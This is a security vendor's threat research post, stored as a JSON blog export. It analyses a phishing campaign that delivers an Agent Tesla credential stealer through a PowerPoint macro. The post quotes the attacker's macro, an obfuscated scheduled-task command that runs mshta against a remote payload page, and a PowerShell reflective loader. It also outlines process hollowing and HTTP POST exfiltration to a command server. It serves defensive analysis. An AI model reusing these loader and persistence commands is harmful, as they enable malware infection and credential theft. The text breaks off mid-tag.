{"id":17988,"date":"2022-02-02T10:18:28","date_gmt":"2022-02-02T18:18:28","guid":{"rendered":"https:\/\/www.palada.net\/index.php\/2022\/02\/02\/news-11721\/"},"modified":"2022-02-02T10:18:28","modified_gmt":"2022-02-02T18:18:28","slug":"news-11721","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2022\/02\/02\/news-11721\/","title":{"rendered":"Phishing Campaign Targeting Korean to Deliver Agent Tesla New Variant"},"content":{"rendered":"<div class=\"aem-Grid aem-Grid--12 aem-Grid--default--12\">\n<div class=\"raw-import aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"text-container\"><\/div>\n<\/p><\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p><b><a href=\"https:\/\/www.fortinet.com\/fortiguard\/labs.html?utm_source=blog&amp;utm_medium=campaign&amp;utm_campaign=FortiGuardLabs\">FortiGuard Labs<\/a>\u00a0Threat\u00a0Research Report<\/b><\/p>\n<p><b>Affected platforms:<\/b>\u00a0Microsoft Windows<br \/> <b>Impacted parties:<\/b>\u00a0 \u00a0 Windows Users<br \/> <b>Impact:<\/b>\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0Collects sensitive information from victims\u2019 device<br \/> <b>Severity level<\/b>: \u00a0 \u00a0 \u00a0 \u00a0 \u00a0Critical<\/p>\n<p>A phishing campaign was recently caught in the wild by Fortinet\u2019s <a href=\"https:\/\/www.fortinet.com\/fortiguard\/labs?utm_source=blog&amp;utm_campaign=fortiguardlabs\">FortiGuard Labs<\/a>, that delivers a malicious Microsoft PowerPoint file. The content of the phishing email,\u00a0\u00a0written in Korean, asks recipients to open the attached PowerPoint file to review a purchase order. I researched what this malicious file does once the PowerPoint file is opened and have been able to confirm that it is spreading a new variant of Agent Tesla.<\/p>\n<p>Over the past several years, we have captured and analyzed many Agent Tesla variants. It has been quite active since 2014 when it was first observed. Agent Tesla is a .Net-based <a href=\"https:\/\/www.fortinet.com\/resources\/cyberglossary\/malware?utm_source=blog&amp;utm_campaign=malware\">malware<\/a> (developed in C#.Net, VB.Net, C++.Net, etc.) whose core function is to collect sensitive information from a victim\u2019s machine, including recording keystrokes and data on the system clipboard, stealing saved software credentials (browsers, mail clients, VPN, FTP, IM, etc.), stealing browser cookies files, and taking screenshots.\u00a0<\/p>\n<p>In this blog we will look at the phishing email, analyze the malicious macro contained in the attachment, show how the malware is updated and maintains persistence, examine the Agent Tesla payload, and show the ways it exfiltrates stolen data and credentials.\u00a0<\/p>\n<p>Let\u2019s start with how most cyberattacks begin \u2013 with a phishing email.<\/p>\n<h2>The Phishing Email<\/h2>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--7 aem-GridColumn--offset--default--3\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/phishing-campaign-targeting-korean-to-deliver-agent-tesla-new-variant\/_jcr_content\/root\/responsivegrid\/image.img.png\/1639164322065\/picture1.png\" alt=\"Figure 1.1 \u2013 Display of the phishing email\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 1.1 \u2013 Display of the phishing email<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>The phishing email is written in Korean and its translated content has been included on the right side of the image in Figure 1.1. The attacker attempts to lure the recipient into opening the attached file to confirm a purchase order. Fortinet\u2019s\u00a0<a href=\"https:\/\/www.fortinet.com\/products\/email-security\/fortimail.html?utm_source=blog&amp;utm_campaign=fortimail-main-page\">FortiMail<\/a>\u00a0has identified this phishing email as SPAM and added a tag \u201c[SPAM detected by FortiMail]\u201d to the subject to warn the recipient, as shown in Figure 1.1.<\/p>\n<h2>Leverage Malicious Macro in PowerPoint<\/h2>\n<p>As you probably guessed, the attached file is fake. There is no slide in the PowerPoint file, but a macro containing an auto-run function method called \u201cAuto_Open()\u201d. This function is called once the file is opened in MS PowerPoint.\u00a0<\/p>\n<p>Here is the VBA code of this method:<\/p>\n<\/p><\/div>\n<div class=\"raw-import aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"text-container\">\n<p class=\"MsoNormal\" style=\"margin: 0in 0in 0.0001pt 0.5in; line-height: normal; font-size: 11pt; font-family: Calibri, sans-serif; color: #000000; font-style: normal; font-weight: normal; text-align: start;\"><span style=\"font-size: 12pt; color: black; background-color: #d9d9d9; background-position: initial initial; background-repeat: initial initial;\">Sub Auto_Open()<\/span><\/p>\n<p class=\"MsoNormal\" style=\"margin: 0in 0in 0.0001pt 0.5in; line-height: normal; font-size: 11pt; font-family: Calibri, sans-serif; color: #000000; font-style: normal; font-weight: normal; text-align: start;\"><span style=\"font-size: 12pt; color: black; background-color: #d9d9d9; background-position: initial initial; background-repeat: initial initial;\">&nbsp;<\/span><\/p>\n<p class=\"MsoNormal\" style=\"margin: 0in 0in 0.0001pt 0.5in; line-height: normal; font-size: 11pt; font-family: Calibri, sans-serif; color: #000000; font-style: normal; font-weight: normal; text-align: start;\"><span style=\"font-size: 12pt; color: black; background-color: #d9d9d9; background-position: initial initial; background-repeat: initial initial;\">p_ = soraj.bear.GroupName<\/span><\/p>\n<p class=\"MsoNormal\" style=\"margin: 0in 0in 0.0001pt 0.5in; line-height: normal; font-size: 11pt; font-family: Calibri, sans-serif; color: #000000; font-style: normal; font-weight: normal; text-align: start;\"><span style=\"font-size: 12pt; color: black; background-color: #d9d9d9; background-position: initial initial; background-repeat: initial initial;\">Shell p_<\/span><\/p>\n<p class=\"MsoNormal\" style=\"margin: 0in 0in 0.0001pt 0.5in; line-height: normal; font-size: 11pt; font-family: Calibri, sans-serif; color: #000000; font-style: normal; font-weight: normal; text-align: start;\"><span style=\"font-size: 12pt; color: black; background-color: #d9d9d9; background-position: initial initial; background-repeat: initial initial;\">&nbsp;<\/span><\/p>\n<p class=\"MsoNormal\" style=\"margin: 0in 0in 0.0001pt 0.5in; line-height: normal; font-size: 11pt; font-family: Calibri, sans-serif; color: #000000; font-style: normal; font-weight: normal; text-align: start;\"><span style=\"font-size: 12pt; color: black; background-color: #d9d9d9; background-position: initial initial; background-repeat: initial initial;\">End Sub<\/span><\/p>\n<\/div><\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>\u201csoraj\u201d is the name of a UserForm, \u201cbear\u201d is the name of CheckBox control inside \u201csoraj\u201d form. It calls \u201cShell\u201d to execute a command read from the \u201cGroupName\u201d property of \u201cbear\u201d CheckBox control. <\/p>\n<p>In this code, \u201csoraj\u201d is the name of a UserForm and \u201cbear\u201d is the name of the CheckBox control inside the \u201csoraj\u201d form. It calls \u201cShell\u201d to execute a command read from the \u201cGroupName\u201d property of the \u201cbear\u201d CheckBox control.\u00a0<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--7 aem-GridColumn--offset--default--3\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/phishing-campaign-targeting-korean-to-deliver-agent-tesla-new-variant\/_jcr_content\/root\/responsivegrid\/image_1818358187.img.png\/1639079175801\/picture2.png\" alt=\"Figure 2.1 \u2013 The value of the property \u201cGroupName\u201d of \u201cbear\u201d\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 2.1 \u2013 The value of the property \u201cGroupName\u201d of \u201cbear\u201d<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Further, \u201cmshta hxxp[:]\/\/bitly[.]com\/gdhamksgdsadj\u201d is the value of the \u201csoraj.bear.GroupName\u201d which is shown in Figure 2, and is the content of a binary profile file (named \u201co\u201d) of the VBA project.\u00a0<\/p>\n<p>It consists of \u201cmshta\u201d and a URL, where \u201cmshta\u201d (\u201cmshta.exe\u201d) is a Windows default program that executes HTML application files, including scripts (like VBScript). The URL opened by \u201cmshta\u201d is redirected to another URL, \u201chxxps[:]\/\/onedayiwillloveyouforever[.]blogspot.com\/p\/divine111.html\u201d, which contains a piece of code used to write an escaped VBScript code to a current HTML document to be executed by \u201cmshta.exe\u201d.<\/p>\n<p>Figure 2.2 is a screenshot of a proxy tool, allowing you to see the URL redirection and escaped VBScript code in the response packet.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--7 aem-GridColumn--offset--default--3\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/phishing-campaign-targeting-korean-to-deliver-agent-tesla-new-variant\/_jcr_content\/root\/responsivegrid\/image_1963402871.img.png\/1639079202288\/picture3.png\" alt=\"Figure 2.2 \u2013 The escaped VBScript code in the response packet\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 2.2 \u2013 The escaped VBScript code in the response packet<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>The escaped VBScript code is executed within the current HTML document using \u201cmshat.exe\u201d. I will refer to this kind of VBScript as VBScript-embedded-in-HTML in this analysis.\u00a0<a href=\"https:\/\/pastebin.com\/Sx5t7yKs\" target=\"_blank\">Click here<\/a>\u00a0to view the entire un-escaped code of the VBScript-embedded-in-HTML.<\/p>\n<h2>VBScript, PowerShell scripts for multiple tasks<\/h2>\n<p>The developer uses a wide variety of scripts, including VBScript-embedded-in-HTML, standalone VBScript, and PowerShell, during the process of delivering Agent Tesla to protect it from being easily analyzed.<\/p>\n<p>These scripts are split into many files, and are downloaded at different times. The VBScript-embedded-in-HTML is the entry of the scripts. In the following section I will explain what they can do according to their behaviors.<\/p>\n<p><b>1. Upgrading \u2013 Task Scheduler:\u00a0<\/b><\/p>\n<p>The malware seeks to obtain a new version (if applicable) every two hours to be executed on the victim\u2019s system. To do this the VBScript-embedded-in-HTML performs a command-line command to add a recurring task into Task Scheduler. The code snippet below is used to run \u201cschtasks\u201d command with the \u201c\/create\u201d option to create a new scheduled task, as shown in Figure 3.1.<\/p>\n<\/p><\/div>\n<div class=\"raw-import aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"text-container\">\n<p class=\"MsoNormal\" style=\"margin: 0in 0in 0.0001pt 0.5in; line-height: normal; font-size: 11pt; font-family: Calibri, sans-serif; color: #000000; font-style: normal; font-weight: normal; text-align: start;\"><span style=\"font-size: 12pt; color: black; background-color: #d9d9d9; background-position: initial initial; background-repeat: initial initial;\">args = &#8220;\/create \/sc MINUTE \/mo&nbsp;<\/span><span style=\"font-size: 12pt; color: red; background-color: #d9d9d9; background-position: initial initial; background-repeat: initial initial;\">120<\/span><span style=\"font-size: 12pt; color: black; background-color: #d9d9d9; background-position: initial initial; background-repeat: initial initial;\">&nbsp;\/tn &#8220;&#8221;&#8221;&#8221;<\/span><span style=\"font-size: 12pt; color: red; background-color: #d9d9d9; background-position: initial initial; background-repeat: initial initial;\">update-Yendex&nbsp;<\/span><span style=\"font-size: 12pt; color: black; background-color: #d9d9d9; background-position: initial initial; background-repeat: initial initial;\">&#8220;&#8221;&#8221;&#8221; \/F \/tr &#8220;&#8221;&#8221;&#8221;&#8221;&#8221;&#8221;&#8221;<\/span><span style=\"font-size: 12pt; color: red; background-color: #d9d9d9; background-position: initial initial; background-repeat: initial initial;\">MsHtA<\/span><span style=\"font-size: 12pt; color: black; background-color: #d9d9d9; background-position: initial initial; background-repeat: initial initial;\">&#8220;&#8221;&#8221;&#8221;&#8221;&#8221;&#8221;&#8221;<\/span><span style=\"font-size: 12pt; color: red; background-color: #d9d9d9; background-position: initial initial; background-repeat: initial initial;\">hxxps:\/\/madarbloghogya.blogspot.com\/p\/divineback222.html<\/span><span style=\"font-size: 12pt; color: black; background-color: #d9d9d9; background-position: initial initial; background-repeat: initial initial;\">&#8220;&#8221;&#8221;&#8221;<\/span><\/p>\n<p class=\"MsoNormal\" style=\"margin: 0in 0in 0.0001pt 0.5in; line-height: normal; font-size: 11pt; font-family: Calibri, sans-serif; color: #000000; font-style: normal; font-weight: normal; text-align: start;\"><span style=\"font-size: 12pt; color: black; background-color: #d9d9d9; background-position: initial initial; background-repeat: initial initial;\">Set Somosa = GetObject(&#8220;new:13709620-C279-11CE-A49E-444553540000&#8221;)<\/span><\/p>\n<p class=\"MsoNormal\" style=\"margin: 0in 0in 0.0001pt 0.5in; line-height: normal; font-size: 11pt; font-family: Calibri, sans-serif; color: #000000; font-style: normal; font-weight: normal; text-align: start;\"><span style=\"font-size: 12pt; color: black; background-color: #d9d9d9; background-position: initial initial; background-repeat: initial initial;\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#8216;schtasks&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&#8216;open<\/span><\/p>\n<p class=\"MsoNormal\" style=\"margin: 0in 0in 0.0001pt 0.5in; line-height: normal; font-size: 11pt; font-family: Calibri, sans-serif; color: #000000; font-style: normal; font-weight: normal; text-align: start;\"><span style=\"font-size: 12pt; color: black; background-color: #d9d9d9; background-position: initial initial; background-repeat: initial initial;\">Somosa&nbsp;<\/span><span style=\"font-size: 12pt; color: red; background-color: #d9d9d9; background-position: initial initial; background-repeat: initial initial;\">Shellexecute&nbsp;<\/span><span style=\"font-size: 12pt; color: black; background-color: #d9d9d9; background-position: initial initial; background-repeat: initial initial;\">StrReverse(&#8220;sksathcs&#8221;), args, &#8220;&#8221;, StrReverse(&#8220;nepo&#8221;),&nbsp;&nbsp;0<\/span><\/p>\n<\/div><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--7 aem-GridColumn--offset--default--3\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/phishing-campaign-targeting-korean-to-deliver-agent-tesla-new-variant\/_jcr_content\/root\/responsivegrid\/image_169840373.img.png\/1639079232035\/picture4.png\" alt=\"Figure 3.1 \u2013 Added scheduled task in Task Scheduler\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 3.1 \u2013 Added scheduled task in Task Scheduler<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>It executes a VBScript code within a remote HTML file, then downloads the Agent Tesla payload to run on the victim\u2019s system. It also detects and kills any other Agent Tesla process instances already running. This allows it to perform its upgrading function.<\/p>\n<p><b>2.\u00a0Persistence \u2013 StartMenu Startup:\u00a0<\/b><\/p>\n<p>A standalone VBS file, \u201c%Public%<a href=\"https:\/\/pastebin.com\/1iKaC4ic\" target=\"_blank\">hulalalMCROSOFT.vbs<\/a>\u201d, extracted from VBScript-embedded-in-HTML downloads another base64-encoded VBS file from \u201chxxps[:]\/\/bitbucket[.]org\/!api\/2.0\/snippets\/hogya\/5X7My8\/b271c1b3c7a78e7b68fa388ed463c7cc1dc32ddb\/files\/divine1-2\u201d into a local file. Going through the base64-decoded code, it saves the VBS code to a file called \u201cUYA-update.vbs\u201c located under %Public% folder.<\/p>\n<p>This standalone VBS file downloads the Agent Tesla payload and deploys it on the victim\u2019s system. As a result, whenever the VBS file is executed it starts Agent Tesla.<\/p>\n<p>To keep Agent Tesla alive on the victim\u2019s system, it copies the downloaded standalone VBS file \u201cUYA-update.vbs\u201d into the StartMenu\u2019s Startup folder and renames it as \u201cGTQ.vbs\u201d. This allows it to start automatically when the system starts. Figure 3.2 displays the Startup folder with the copied \u201cGTQ.vbs\u201d.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--7 aem-GridColumn--offset--default--3\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/phishing-campaign-targeting-korean-to-deliver-agent-tesla-new-variant\/_jcr_content\/root\/responsivegrid\/image_1119377242.img.png\/1639079260737\/picture5.png\" alt=\"Figure 3.2 \u2013 Standalone VBS file copied in StartMenu Startup folder\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 3.2 \u2013 Standalone VBS file copied in StartMenu Startup folder<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p><b>3.\u00a0Perform process-hollowing:<\/b><\/p>\n<p>\u201cUYA-update.vbs\u201d continues to craft a piece of PowerShell code within a base64-decoded PE file from a local variable. It is ultimately executed by \u201cPowerShell.exe\u201d. The decoded PE file is a .Net program that contains a function named \u201cRun()\u201d belonging to class \u201cClassLibrary3.Class1\u201d. Below is a piece of PowerShell code used to call this function.<\/p>\n<\/p><\/div>\n<div class=\"raw-import aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"text-container\">\n<p class=\"MsoNormal\" style=\"margin: 0in 0in 0.0001pt 0.5in; line-height: normal; font-size: 11pt; font-family: Calibri, sans-serif; color: #000000; font-style: normal; font-weight: normal; text-align: start;\"><span style=\"font-size: 12pt; color: black; background-color: #d9d9d9; background-position: initial initial; background-repeat: initial initial;\">[System.AppDomain]::CurrentDomain.Load($fuUN).GetType(&#8216;ClassLibrary3.Class1&#8217;).GetMethod(<\/span><span style=\"font-size: 12pt; color: red; background-color: #d9d9d9; background-position: initial initial; background-repeat: initial initial;\">&#8216;Run&#8217;<\/span><span style=\"font-size: 12pt; color: black; background-color: #d9d9d9; background-position: initial initial; background-repeat: initial initial;\">).Invoke($null, [object[]] (&#8216;1-1enivid\/selif\/c4ab4d371cd40ce3303b4d33c868122f671fd37c\/do8qxn\/aygoh\/steppins\/0.2\/ipa!\/gro.tekcubtib\/\/:sptth&#8217;))<\/span><\/p>\n<\/div><\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>The \u201c$fuUN\u201d variable contains the base64-decoded .Net PE file, from which it calls GetType() and GetMethod() to obtain the function \u201cClassLibrary3.Class1.Run()\u201d. Next, it calls the \u201cRun()\u201d function through Invoke() and passes a parameter with a reversed URL. The URL is \u201chxxps[:]\/\/bitbucket[.]org\/!api\/2.0\/snippets\/hogya\/nxq8od\/c73df176f221868c33d4b3033ec04dc173d4ba4c\/files\/divine1-1\u201d. Figure 3.3 is the entire code of function \u201cClassLibrary3.Class1.Run()\u201d.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--7 aem-GridColumn--offset--default--3\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/phishing-campaign-targeting-korean-to-deliver-agent-tesla-new-variant\/_jcr_content\/root\/responsivegrid\/image_1809766221.img.png\/1639095165212\/picture1.png\" alt=\"Figure 3.3 \u2013 Function of \u201cClassLibrary3.Class1.Run()\u201d\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 3.3 \u2013 Function of \u201cClassLibrary3.Class1.Run()\u201d<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>After successfully calling &quot;ClassLibrary3.Class1.Run()&quot; of the decoded PE, it downloads two files from the hyperlinks: &#8216;hxxp[:]\/\/149.56.200.165\/rump\/1.txt&#8217;, which is for another .Net module to perform process-hollowing, and &#8216;hxxps[:]\/\/bitbucket[.]org\/!api\/2.0\/snippets\/hogya\/nxq8od\/c73df176f221868c33d4b3033ec04dc173d4ba4c\/files\/divine1-1&#8217;, which is passed from PowerShell and is where it downloads the Agent Tesla payload from.<\/p>\n<p>The Agent Tesla payload is fileless on the victim\u2019s system. It is only kept in the memory of the PowerShell process. The downloaded .Net module has a function named \u201cClassLibrary1.Class1.Run()\u201d that perform the process-hollowing. It passes the Agent Tesla payload in memory and adds a path of the target process \u201cRegAsm.exe\u201d.\u00a0<\/p>\n<p>\u201cRegAsm.exe\u201d is an official component of Microsoft .Net Framework. The attacker uses it as a target process in which to inject malware to protect itself from being detected.<\/p>\n<p>A number of Windows <a href=\"https:\/\/www.fortinet.com\/resources\/cyberglossary\/api-security?utm_source=blog&amp;utm_campaign=api-security\">API<\/a> functions are called in the .Net module to deploy the Agent Tesla payload into the target process. These are:<\/p>\n<ul>\n<li>CreateProcess() with\u00a0CREATE_SUSPENDED\u00a0flag: This creates a suspended RegAsm.exe process.<\/li>\n<li>VirtualAllocEx(), NtUnmapViewOfSection(), ReadProcessMemory(), WriteProcessMemory(): These move the Agent Tesla payload to a newly-allocated memory within the suspended RegAsm.exe process.<\/li>\n<li>SetThreadContext()\/Wow64SetThreadContext(), GetThreadContext()\/Wow64GetThreadContext(): These modify the RegAsm.exe\u2019s registry value and points its EIP register to the entry point of the copied Agent Tesla payload.<\/li>\n<li>ResumeThread(): This resumes the execution of\u00a0the RegAsm.exe process from where the EIP points to.<\/li>\n<\/ul>\n<p>Once completed, the Agent Tesla runs on behalf of RegAsm.exe to steal the victim\u2019s information.<\/p>\n<h2>Agent Tesla Payload<\/h2>\n<p>Agent Tesla provides many features, like Keylogger, obtaining Clipboard data, stealing browser cookies and saved software credentials, as well as capturing screenshots of the victim\u2019s device.\u00a0<\/p>\n<p>Agent Tesla publishes a Setup program that allows the attacker to choose which features to enable. The Tesla Agent Setup program then compiles the Agent Tesla payload file according to those choices.<\/p>\n<p>Agent Tesla starts these tasks in its Main() (stealing credentials), Timer (keylogger, stealing clipboard data, taking screenshots), and Thread (stealing cookies from browsers) functions.<\/p>\n<p>In this variant of Agent Tesla, the attacker has only enabled stealing credentials and cookies. The count of the software clients from which it steals credentials is more than 70, and can be categorized as Web Browsers,\u00a0Email Clients,\u00a0IM Clients,\u00a0VPN\/FTP\/Downloader\/Database\u00a0Clients, and Windows Credentials.\u00a0<\/p>\n<p>The list of the affected\u00a0software\u00a0clients is\u00a0listed as below:<\/p>\n<p><b>Chromium-based Web Browsers:<br \/>  <\/b>Epic Privacy, Uran, Chedot, Comodo Dragon, Chromium, Orbitum, Cool Novo, Sputnik, Coowon, Brave, Liebao Browser, Elements Browser, Sleipnir 6, Vivaldi, 360 Browser, Torch Browser, Yandex Browser, QIP Surf, Amigo, Kometa, Citrio, Opera Browser, CentBrowser, 7Star, Coccoc, and Iridium Browser.<\/p>\n<p><b>Web Browsers:<br \/>  <\/b>Chrome, Microsoft Edge, Firefox, Safari, IceCat, Waterfox, Tencent QQBrowser, Flock Browser, SeaMonkey, IceDragon, Falkon, UCBrowser, Cyberfox, K-Meleon, PaleMoon.<\/p>\n<p><b>VPN clients:<br \/>  <\/b>OpenVPN, NordVPN, RealVNC, TightVNC, UltraVNC, Private Internet Access VPN.<\/p>\n<p><b>FTP clients:<br \/>  <\/b>FileZilla, Cftp, WS_FTP, FTP Navigator, FlashFXP, SmartFTP, WinSCP 2, CoreFTP, FTPGetter.<\/p>\n<p><b>Email clients:<br \/>  <\/b>Outlook, Postbox, Thunderbird, Mailbird, eM Client, Claws-mail, Opera Mail, Foxmail, Qualcomm Eudora, IncrediMail, Pocomail, Becky! Internet Mail, The Bat!.<\/p>\n<p><b>Downloader\/IM clients:<br \/>  <\/b>DownloadManager, jDownloader, Psi+, Trillian.<\/p>\n<p><b>Others:<br \/>  <\/b>MySQL and Microsoft Credentials.<\/p>\n<p>Figure 4.1 displays the method used for stealing credentials from several clients.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--7 aem-GridColumn--offset--default--3\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/phishing-campaign-targeting-korean-to-deliver-agent-tesla-new-variant\/_jcr_content\/root\/responsivegrid\/image_446925587.img.png\/1639095280352\/picture4.png\" alt=\"Figure 4.1 \u2013 Method used to steal credentials from some software clients\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 4.1 \u2013 Method used to steal credentials from some software clients<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p class=\"cq-text-placeholder-ipe\" data-emptytext=\"Text\">\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--7 aem-GridColumn--offset--default--3\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/phishing-campaign-targeting-korean-to-deliver-agent-tesla-new-variant\/_jcr_content\/root\/responsivegrid\/image_1609329313.img.png\/1639095322285\/picture2.png\" alt=\"Figure 4.2 \u2013 Display of stolen credentials from IceCat browser\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 4.2 \u2013 Display of stolen credentials from IceCat browser<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Figure 4.2 shows the credentials just stolen from a web browser, \u201cIceCat\u201d, where \u201cBrowser\u201d is the software client name, \u201cPassword\u201d is the saved password, \u201cURL\u201d is the login page, and \u201cUserName\u201d is the saved login user name.\u00a0<\/p>\n<p>Each credentials of the stolen credentials has an above structure and saved in a global list variable, which later is formatted and sent to the attacker.<\/p>\n<h2>Sending the Stolen Data to the Attacker<br \/> <\/h2>\n<p>There are four ways to transport the stolen data to the attacker. These are FTP Data (uploading stolen data in a file to a FTP server provided by the attacker), HTTP Post (sending data as the body of the post to a URL provided by the attacker), SMTP (sending stolen data to the attacker\u2019s email address), and Telegram\u00a0(using the\u00a0Telegram bot API \u201csendDocument()\u201d\u00a0to send files to a specified chat or channel).\u00a0<\/p>\n<p>The attacker chose HTTP Post for this variant. Once\u00a0Agent Tesla needs to send data to the attacker, it encrypts the stolen data using a DES algorithm and encodes the result using a base64 algorithm, which is the final data to be sent as the body in the HTTP Post request.\u00a0The submission URL is\u00a0&quot;hxxp[:]\/\/69[.]174.99[.]181\/webpanel-divine\/mawa\/7dd66d9f8e1cf61ae198.php&quot;, which is a hardcoded string in Agent Tesla.\u00a0<\/p>\n<p>Figure 5.1 demonstrates Agent Tesla sending stolen data as a value of \u201cp=\u201d in the body of HTTP POST.<\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--7 aem-GridColumn--offset--default--3\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/phishing-campaign-targeting-korean-to-deliver-agent-tesla-new-variant\/_jcr_content\/root\/responsivegrid\/image_858549136.img.png\/1639095424767\/picture5.png\" alt=\"Figure 5.1 \u2013 Stolen data being sent in the body of HTTP Post\"\/>         <\/noscript>          <span class=\"cmp-image--title\">Figure 5.1 \u2013 Stolen data being sent in the body of HTTP Post<\/span>         <\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p>Each item of stolen data before encryption is kept in the structure \u2014 \u201cheader\u201d + \u201cdata\u201d.\u00a0<\/p>\n<ul>\n<li>The \u201cheader\u201d contains the basic information of the victim\u2019s system:<\/li>\n<\/ul>\n<p>\u201cPacket number\u201d + \u201dSeparator\u201d + \u201cVictim ID\u201d + \u201dSeparator\u201d + \u201cDate and Time\u201d + \u201dSeparator string\u201d + \u201cUserName\/ComputerName\u201d + \u201dSeparator\u201d<\/p>\n<ul>\n<li>The \u201cdata\u201d contains the stolen information, like credentials and cookies.\u00a0<\/li>\n<\/ul><\/div>\n<div class=\"cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--7 aem-GridColumn--offset--default--3\">               <noscript data-cmp-image=\"{&#34;smartImages&#34;:[],&#34;smartSizes&#34;:[],&#34;lazyEnabled&#34;:true}\">             <img decoding=\"async\" src=\"\/blog\/threat-research\/phishing-campaign-targeting-korean-to-deliver-agent-tesla-new-variant\/_jcr_content\/root\/responsivegrid\/image_68790556.img.png\/1639095484094\/picture6png.png\" alt=\"Figure 5.2 \u2013 Example of a packet structure with packet number \u201c6\u201d\"\/>         <\/noscript>          <span 